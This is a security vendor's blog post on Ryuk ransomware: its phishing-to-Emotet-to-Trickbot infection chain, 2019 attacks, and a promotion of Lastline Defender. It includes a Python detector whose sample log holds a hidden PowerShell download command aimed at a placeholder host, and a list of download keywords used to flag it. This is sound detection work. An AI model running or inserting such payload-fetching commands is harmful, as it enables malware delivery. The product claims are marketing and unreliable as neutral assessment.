Ryuk: Defending Against This Increasingly Busy Ransomware Family

On December 16, 2019, the U.S. Coast Guard disclosed a security incident at a facility regulated by the Maritime Transportation Security Act (MTSA). Forensic analysis suggests that the incident might have begun when an employee clicked on a link embedded in a phishing email. This action enabled a threat actor to set Ryuk ransomware loose on the facility’s network. Ultimately, the infection spread to all IT network files, leading Ryuk to disrupt the corporate IT network and prevent critical process control monitoring systems from functioning properly.

The incident at the MTSA-regulated facility is just one of the latest attacks to involve Ryuk. Given the crypto-malware’s growing threat activity, I’ll use this blog to explain how Ryuk works. I’ll then look at some other recent infections involving this ransomware before exploring how Lastline’s network detection and response solution can defend against a Ryuk attack.

Some Background Information on Ryuk

Phishing is one of the primary infection vectors for most ransomware families. The same goes for Ryuk. But there’s an interesting twist with this particular family.

As noted by Malwarebytes, a typical Ryuk attack begins when a user opens a weaponized Microsoft Office document attached to a phishing email. Opening the document causes a malicious macro to execute a PowerShell command that attempts to download Emotet. Emotet, a banking trojan with the ability to download additional malware onto an infected machine, retrieves and executes Trickbot. This secondary payload, in turn, collects admin credentials, allowing digital attackers to move laterally to critical assets connected to the network. The attack chain concludes when the attackers execute Ryuk on each of these assets.
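The first link in that chain, an Office process spawning PowerShell to fetch a payload, is visible in process-creation telemetry. The following Python detector is an added example, not code from the original article or from Lastline; the log lines are constructed in a simplified Sysmon Event ID 1 style, and the field names (ParentImage, Image, CommandLine) and the download-related keywords are assumptions about the log source.

```python
"""Flag the Office-macro -> PowerShell step of the Ryuk infection chain.

Added example; constructed sample data. Field names and keyword list are
assumptions, not taken from any specific product or the original article.
"""
from typing import NamedTuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Substrings that suggest PowerShell is retrieving a second stage over the network.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "webclient", "http")


class Alert(NamedTuple):
    line_no: int
    parent: str
    child: str
    severity: str


def parse_event(line: str) -> dict:
    """Parse 'Key=Value' fields separated by '|' into a dict (constructed format)."""
    return dict(part.split("=", 1) for part in line.strip().split("|") if "=" in part)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines):
    """Return an Alert for every Office -> PowerShell process creation.

    Severity is 'high' when the command line also looks like a download,
    'medium' for any other Office-spawned PowerShell (still worth review).
    """
    alerts = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
        if parent in OFFICE_PARENTS and child in POWERSHELL_IMAGES:
            cmd = ev.get("CommandLine", "").lower()
            severity = "high" if any(h in cmd for h in DOWNLOAD_HINTS) else "medium"
            alerts.append(Alert(n, parent, child, severity))
    return alerts


# Constructed sample events: line 1 mirrors the chain described above, line 4 is
# Office-spawned PowerShell without a download, lines 2 and 3 are benign.
SAMPLE_LOG = [
    r"EventID=1|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -c Invoke-WebRequest http://payload.example/stage",
    r"EventID=1|ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\scripts\backup.ps1",
    r"EventID=1|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\splwow64.exe|CommandLine=splwow64.exe 12288",
    r"EventID=1|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Running the block prints two alerts: a high-severity one for line 1 and a medium-severity one for line 4; the explorer-launched script and Word's print helper are not flagged.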

Ransomware victims are always in a difficult position when they have no data backup from which to recover their files. In the case of Ryuk, the position is especially bad. McAfee reported in February 2019 that the typical Ryuk ransom demand amounted to $145,000—more than 10 times the average ransomware amount. Ryuk’s handlers were sometimes willing to negotiate; even then, the average ransom amount after negotiation was still as high as $71,000.

Recent Attacks Involving Ryuk Ransomware

The security community documented numerous Ryuk attacks in 2019. Even so, the ransomware had a particularly busy final quarter. Here are just some of the infections that made headlines during this three-month period.

  • National Veterinary Associates: In mid-November, KrebsOnSecurity revealed that National Veterinary Associates had suffered a Ryuk ransomware infection. The attack limited the availability of patient records, payment systems and practice management software at 400 veterinary clinics operated by the California company. In response to the infection, NVA hired two outside security firms to assist in its recovery effort.
  • Virtual Care Provider Inc.: Less than a week later, KrebsOnSecurity reported another Ryuk attack. This incident involved Virtual Care Provider Inc. (VCPI), a Wisconsin-based IT company that provides data hosting and other IT services to over 100 nursing homes located in the United States. As a result of the attack, these medical facilities were temporarily unable to access their patients’ medical records.
  • Louisiana State Government: Around that same time, ArsTechnica covered a Ryuk attack that forced Louisiana’s Office of Technology Services to shut down parts of the state government’s network. It took this measure to prevent the ransomware from spreading to other state agencies. The governor’s office and the Department of Health were among the departments affected by the shutdown and ransomware attack.
  • Prosegur: Near the end of November, news emerged that the Spanish multinational cash logistics company Prosegur had temporarily shut down its IT network following a Ryuk attack. The company confirmed on Twitter that it had experienced a “security information incident in its telecommunications platforms.” Not long afterward, Prosegur revealed that it had taken “maximum security measures” to prevent Ryuk from spreading.
  • The City of New Orleans: On December 13, 2019, the City of New Orleans declared a state of emergency after suffering a ransomware attack. One day later, Bleeping Computer learned of a memory dump that contained numerous references to both Ryuk and New Orleans, including domain names and file shares. These resources suggest there was at least some connection between Ryuk and the New Orleans ransomware attack.
  • DCH Health System: Near the end of December, Advance Local revealed that four patients had filed a class action lawsuit against DCH Health System. Their lawsuit alleged that the hospital had violated HIPAA and endangered their medical care in relation to a Ryuk ransomware attack that occurred three months earlier. That infection disrupted DCH’s operations for 10 days, according to Advance Local.

How to Defend Against Ryuk Ransomware

Organizations can’t rely on simply paying the ransom following a Ryuk ransomware infection. First, many organizations can’t afford to pay these ransoms without closing their doors, as demands oftentimes amount to hundreds of thousands if not millions of dollars. Second, there’s no guarantee that victims will recover their files even if they do pay. As reported by Emsisoft, for instance, one decryptor provided by Ryuk’s handlers contained a bug that could have prevented victims from restoring large files affected by the ransomware.

These facts, coupled with the growing rate of ransomware evasion, highlight the need for organizations to invest in a solution like Lastline Defender. This security solution is capable of detecting ransomware and malware across all platforms because it doesn’t just look at a suspicious program in isolation. Lastline Defender uses supervised and unsupervised machine learning to look for a litany of tell-tale signs that a malware infection has taken place. It then stitches these signs together to build a comprehensive picture of what a program does, and it uses this picture to categorize or score the program’s potentially malicious nature.

Since Lastline Defender relies on behavior-based detection, it doesn’t matter if it’s never seen a sample of Ryuk. It also doesn’t matter if a malware family is polymorphic and thus constantly creating slightly different variants. If it behaves like malware or ransomware, Lastline will detect it.

Use Lastline Defender to strengthen your organization’s defenses against Ryuk and other ransomware families.

This article recently appeared in InfoSecurity.

Richard Henderson

Richard Henderson is Head of Global Threat Intelligence, where he is responsible for trend-spotting, industry-watching, and evangelizing the unique capabilities of Lastline’s technologies. He has nearly two decades of experience and involvement in the global hacker community and discovers new trends and activities in the cyber-underground. He is a researcher and regular presenter at conferences and events and was lauded by a former US DHS undersecretary for cybersecurity as having an “insightful view” on the current state of cybersecurity. Richard was one of the first researchers in the world to defeat Apple’s TouchID fingerprint sensor on the iPhone 5S. He has taught courses on radio interception techniques multiple times at the DEFCON hacker conference. Richard is a regular writer and contributor to many publications including BankInfoSecurity, Forbes, Dark Reading, and CSO.